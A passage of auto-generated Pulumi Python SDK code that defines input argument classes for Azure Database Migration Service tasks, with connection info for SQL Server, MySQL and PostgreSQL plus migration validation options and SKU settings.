:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['MigrationValidationOptionsArgs'] validation_options: Validation options
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if validation_options is not None:
pulumi.set(__self__, "validation_options", validation_options)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="validationOptions")
def validation_options(self) -> Optional[pulumi.Input['MigrationValidationOptionsArgs']]:
"""
Validation options
"""
return pulumi.get(self, "validation_options")
@validation_options.setter
def validation_options(self, value: Optional[pulumi.Input['MigrationValidationOptionsArgs']]):
pulumi.set(self, "validation_options", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates on-prem SQL Server databases to Azure SQL Database for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDb.Sync'.
:param pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlDbSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlDbTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
validation_options: Optional[pulumi.Input['MigrationValidationOptionsArgs']] = None):
"""
Input for the task that migrates on-prem SQL Server databases to Azure SQL Database
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
        :param pulumi.Input['MigrationValidationOptionsArgs'] validation_options: Options for enabling various post-migration validations. Available options:
        1.) Data Integrity Check: performs a checksum-based comparison of source and target tables after the migration to ensure the correctness of the data.
        2.) Schema Validation: performs a thorough schema comparison between the source and target tables and provides a list of differences between the source and target databases.
        3.) Query Analysis: executes a set of queries picked up automatically from either the Query Plan Cache or the Query Store and compares their execution times between the source and target databases.
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if validation_options is not None:
pulumi.set(__self__, "validation_options", validation_options)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="validationOptions")
def validation_options(self) -> Optional[pulumi.Input['MigrationValidationOptionsArgs']]:
"""
        Options for enabling various post-migration validations. Available options:
        1.) Data Integrity Check: performs a checksum-based comparison of source and target tables after the migration to ensure the correctness of the data.
        2.) Schema Validation: performs a thorough schema comparison between the source and target tables and provides a list of differences between the source and target databases.
        3.) Query Analysis: executes a set of queries picked up automatically from either the Query Plan Cache or the Query Store and compares their execution times between the source and target databases.
"""
return pulumi.get(self, "validation_options")
@validation_options.setter
def validation_options(self, value: Optional[pulumi.Input['MigrationValidationOptionsArgs']]):
pulumi.set(self, "validation_options", value)
@pulumi.input_type
class MigrateSqlServerSqlDbTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']] = None):
"""
Properties for the task that migrates on-prem SQL Server databases to Azure SQL Database
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.SqlDb'.
:param pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.SqlDb')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.SqlDb'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlDbTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlMIDatabaseInputArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
restore_database_name: pulumi.Input[str],
backup_file_paths: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
Database specific information for SQL to Azure SQL DB Managed Instance migration task inputs
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[str] restore_database_name: Name of the database at destination
:param pulumi.Input[Sequence[pulumi.Input[str]]] backup_file_paths: The list of backup files to be used in case of existing backups.
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for backing up this database.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "restore_database_name", restore_database_name)
if backup_file_paths is not None:
pulumi.set(__self__, "backup_file_paths", backup_file_paths)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restoreDatabaseName")
def restore_database_name(self) -> pulumi.Input[str]:
"""
Name of the database at destination
"""
return pulumi.get(self, "restore_database_name")
@restore_database_name.setter
def restore_database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "restore_database_name", value)
@property
@pulumi.getter(name="backupFilePaths")
def backup_file_paths(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of backup files to be used in case of existing backups.
"""
return pulumi.get(self, "backup_file_paths")
@backup_file_paths.setter
def backup_file_paths(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "backup_file_paths", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for backing up this database.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class MigrateSqlServerSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
storage_resource_id: pulumi.Input[str],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
Input for task that migrates SQL Server databases to Azure SQL Database Managed Instance online scenario.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input[str] storage_resource_id: Fully qualified resourceId of storage
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
Fully qualified resourceId of storage
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class MigrateSqlServerSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']] = None):
"""
Properties for task that migrates SQL Server databases to Azure SQL Database Managed Instance sync scenario
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlMITaskInputArgs:
def __init__(__self__, *,
backup_blob_share: pulumi.Input['BlobShareArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None,
backup_mode: Optional[pulumi.Input[Union[str, 'BackupMode']]] = None,
selected_agent_jobs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
selected_logins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input for task that migrates SQL Server databases to Azure SQL Database Managed Instance.
:param pulumi.Input['BlobShareArgs'] backup_blob_share: SAS URI of Azure Storage Account Container to be used for storing backup files.
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
        :param pulumi.Input[Union[str, 'BackupMode']] backup_mode: Backup mode specifying whether to use an existing backup or create a new one. If using existing backups, backup file paths must be provided in selectedDatabases.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_agent_jobs: Agent Jobs to migrate.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_logins: Logins to migrate.
"""
pulumi.set(__self__, "backup_blob_share", backup_blob_share)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
if backup_mode is not None:
pulumi.set(__self__, "backup_mode", backup_mode)
if selected_agent_jobs is not None:
pulumi.set(__self__, "selected_agent_jobs", selected_agent_jobs)
if selected_logins is not None:
pulumi.set(__self__, "selected_logins", selected_logins)
@property
@pulumi.getter(name="backupBlobShare")
def backup_blob_share(self) -> pulumi.Input['BlobShareArgs']:
"""
SAS URI of Azure Storage Account Container to be used for storing backup files.
"""
return pulumi.get(self, "backup_blob_share")
@backup_blob_share.setter
def backup_blob_share(self, value: pulumi.Input['BlobShareArgs']):
pulumi.set(self, "backup_blob_share", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="backupMode")
def backup_mode(self) -> Optional[pulumi.Input[Union[str, 'BackupMode']]]:
"""
        Backup mode specifying whether to use an existing backup or create a new one. If using existing backups, backup file paths must be provided in selectedDatabases.
"""
return pulumi.get(self, "backup_mode")
@backup_mode.setter
def backup_mode(self, value: Optional[pulumi.Input[Union[str, 'BackupMode']]]):
pulumi.set(self, "backup_mode", value)
@property
@pulumi.getter(name="selectedAgentJobs")
def selected_agent_jobs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Agent Jobs to migrate.
"""
return pulumi.get(self, "selected_agent_jobs")
@selected_agent_jobs.setter
def selected_agent_jobs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_agent_jobs", value)
@property
@pulumi.getter(name="selectedLogins")
def selected_logins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Logins to migrate.
"""
return pulumi.get(self, "selected_logins")
@selected_logins.setter
def selected_logins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_logins", value)
@pulumi.input_type
class MigrateSqlServerSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']] = None):
"""
Properties for task that migrates SQL Server databases to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI'.
:param pulumi.Input['MigrateSqlServerSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.SqlServer.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.SqlServer.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateSqlServerSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrationValidationOptionsArgs:
def __init__(__self__, *,
enable_data_integrity_validation: Optional[pulumi.Input[bool]] = None,
enable_query_analysis_validation: Optional[pulumi.Input[bool]] = None,
enable_schema_validation: Optional[pulumi.Input[bool]] = None):
"""
Types of validations to run after the migration
        :param pulumi.Input[bool] enable_data_integrity_validation: Allows performing a checksum-based data integrity validation between source and target for the selected databases/tables.
        :param pulumi.Input[bool] enable_query_analysis_validation: Allows performing a quick and intelligent query analysis by retrieving queries from the source database and executing them in the target. The result includes execution statistics for the extracted queries in both the source and target databases.
        :param pulumi.Input[bool] enable_schema_validation: Allows comparing the schema information between source and target.
"""
if enable_data_integrity_validation is not None:
pulumi.set(__self__, "enable_data_integrity_validation", enable_data_integrity_validation)
if enable_query_analysis_validation is not None:
pulumi.set(__self__, "enable_query_analysis_validation", enable_query_analysis_validation)
if enable_schema_validation is not None:
pulumi.set(__self__, "enable_schema_validation", enable_schema_validation)
@property
@pulumi.getter(name="enableDataIntegrityValidation")
def enable_data_integrity_validation(self) -> Optional[pulumi.Input[bool]]:
"""
        Allows performing a checksum-based data integrity validation between source and target for the selected databases/tables.
"""
return pulumi.get(self, "enable_data_integrity_validation")
@enable_data_integrity_validation.setter
def enable_data_integrity_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_data_integrity_validation", value)
@property
@pulumi.getter(name="enableQueryAnalysisValidation")
def enable_query_analysis_validation(self) -> Optional[pulumi.Input[bool]]:
"""
        Allows performing a quick and intelligent query analysis by retrieving queries from the source database and executing them in the target. The result includes execution statistics for the extracted queries in both the source and target databases.
"""
return pulumi.get(self, "enable_query_analysis_validation")
@enable_query_analysis_validation.setter
def enable_query_analysis_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_query_analysis_validation", value)
@property
@pulumi.getter(name="enableSchemaValidation")
def enable_schema_validation(self) -> Optional[pulumi.Input[bool]]:
"""
        Allows comparing the schema information between source and target.
"""
return pulumi.get(self, "enable_schema_validation")
@enable_schema_validation.setter
def enable_schema_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_schema_validation", value)
@pulumi.input_type
class MySqlConnectionInfoArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
server_name: pulumi.Input[str],
type: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to MySQL server
:param pulumi.Input[int] port: Port for Server
:param pulumi.Input[str] server_name: Name of the server
:param pulumi.Input[str] type: Type of connection info
Expected value is 'MySqlConnectionInfo'.
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "type", 'MySqlConnectionInfo')
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port for Server
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Name of the server
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'MySqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class PostgreSqlConnectionInfoArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
server_name: pulumi.Input[str],
type: pulumi.Input[str],
database_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to PostgreSQL server
:param pulumi.Input[int] port: Port for Server
:param pulumi.Input[str] server_name: Name of the server
:param pulumi.Input[str] type: Type of connection info
Expected value is 'PostgreSqlConnectionInfo'.
:param pulumi.Input[str] database_name: Name of the database
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "type", 'PostgreSqlConnectionInfo')
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port for Server
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Name of the server
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'PostgreSqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SelectedCertificateInputArgs:
def __init__(__self__, *,
certificate_name: pulumi.Input[str],
password: pulumi.Input[str]):
"""
Info for certificate to be exported for TDE enabled databases.
:param pulumi.Input[str] certificate_name: Name of certificate to be exported.
:param pulumi.Input[str] password: Password to use for encrypting the exported certificate.
"""
pulumi.set(__self__, "certificate_name", certificate_name)
pulumi.set(__self__, "password", password)
@property
@pulumi.getter(name="certificateName")
def certificate_name(self) -> pulumi.Input[str]:
"""
Name of certificate to be exported.
"""
return pulumi.get(self, "certificate_name")
@certificate_name.setter
def certificate_name(self, value: pulumi.Input[str]):
pulumi.set(self, "certificate_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
Password to use for encrypting the exported certificate.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@pulumi.input_type
class ServiceSkuArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input[int]] = None,
family: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input[str]] = None):
"""
An Azure SKU instance
:param pulumi.Input[int] capacity: The capacity of the SKU, if it supports scaling
:param pulumi.Input[str] family: The SKU family, used when the service has multiple performance classes within a tier, such as 'A', 'D', etc. for virtual machines
:param pulumi.Input[str] name: The unique name of the SKU, such as 'P3'
:param pulumi.Input[str] size: The size of the SKU, used when the name alone does not denote a service size or when a SKU has multiple performance classes within a family, e.g. 'A1' for virtual machines
:param pulumi.Input[str] tier: The tier of the SKU, such as 'Free', 'Basic', 'Standard', or 'Premium'
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if name is not None:
pulumi.set(__self__, "name", name)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
The capacity of the SKU, if it supports scaling
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def family(self) -> Optional[pulumi.Input[str]]:
"""
The SKU family, used when the service has multiple performance classes within a tier, such as 'A', 'D', etc. for virtual machines
"""
return pulumi.get(self, "family")
@family.setter
def family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "family", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The unique name of the SKU, such as 'P3'
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of the SKU, used when the name alone does not denote a service size or when a SKU has multiple performance classes within a family, e.g. 'A1' for virtual machines
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
"""
